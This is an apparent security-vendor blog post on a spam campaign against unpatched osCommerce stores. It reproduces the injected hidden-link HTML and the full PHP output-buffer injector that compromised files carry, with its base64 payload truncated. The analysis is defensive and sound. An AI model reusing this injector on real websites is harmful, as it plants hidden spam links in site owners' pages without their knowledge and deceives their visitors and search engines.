Attacks against osCommerce sites – Spam / google_analytics_obh

It seems that the attacks against osCommerce are not going to stop any time soon. With so many valuable targets (online stores) that are not updated and secured, why would they?


*If you have an osCommerce site, please follow these steps to make sure it doesn’t keep getting hacked. You can also scan it here to check if it’s clean: Sucuri SiteCheck


After all the latest osCommerce malware (div_colors, nt07.in, CreateCSS, willysy.com, etc), we’re seeing an old attack reemerging in full force, and compromising thousands of sites.

The attack is the “__google_analytics_obh” that add hidden links (for Blackhat SEO spam) to the sites. It has been happening for a while, but for the last few days, it just grew in mass scale.

This is what shows up on a compromised site:

<!–4566d6815c68357b60bb1–><div style="position:absolute;  left:324px;  top:  -100px;"><a href="http://www&#46gamedak&#46com/">online games</a></div><!–/4556d684abc4d1b60bb1–>

These hidden links are generated from a base64_decode piece at the top of the PHP files:

<?php // 24d684abc4d11125c68357b60bb3aa0b
if (!function_exists(‘__google_analytics_obh’)){
function __google_analytics_obh ($c){
    $i = base64_decode(‘PCEtLTI0ZDY4NGFiYzRkMTExMjVjN..’);
    $tmpdir = getenv(‘TMP’);
    if (empty($tmpdir)) $tmpdir = getenv(‘TEMP’);
    if (empty($tmpdir)) $tmpdir = getenv(‘TMPDIR’);
    $pgid = @$_SERVER[‘REQUEST_URI’];
    if (empty($pgid)) $pgid = __FILE__;
    $f = $tmpdir&#46md5(’42:)’&#46$pgid);
    if (!file_exists($f))
    {
        $pos = mt_rand(0, 10) / 10;
        file_put_contents($f, $pos);
    }
    else $pos = file_get_contents($f);
    $c2 = strtolower($c);
    $tags = array(‘</p>’, ‘</div>’, ‘</table>’);
    $injpos = strpos($c2, ‘</body>’) or strlen($c);
    $p = round($injpos * $pos);
    if ($p < 0) $p = 0; if ($p > $injpos) $p = $injpos;
    foreach ($tags as $tag) {
        $t = strpos($c2, $tag, $p);
        if ($t)
        {
            $injpos = $t + strlen($tag);
            break;
        }
    }
        return substr($c, 0, $injpos) &#46 $i &#46 substr($c, $injpos);
    }
    @ob_start(__google_analytics_obh);
}

The spam links are changing on each site, sometimes pointing to online game stores, Pharma, and all types of sites (including a spam link to http://192–168–1–1.info/, with the keyword 192.168.1.1).

Why are the attackers focusing on spam and not on malware? Probably because they are harder to detect and can provide some valuable PR (page rank) to their other sites. Specially if they are also in the SEO business and selling that to their clients.

Leav us your thoughts and comments below.

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.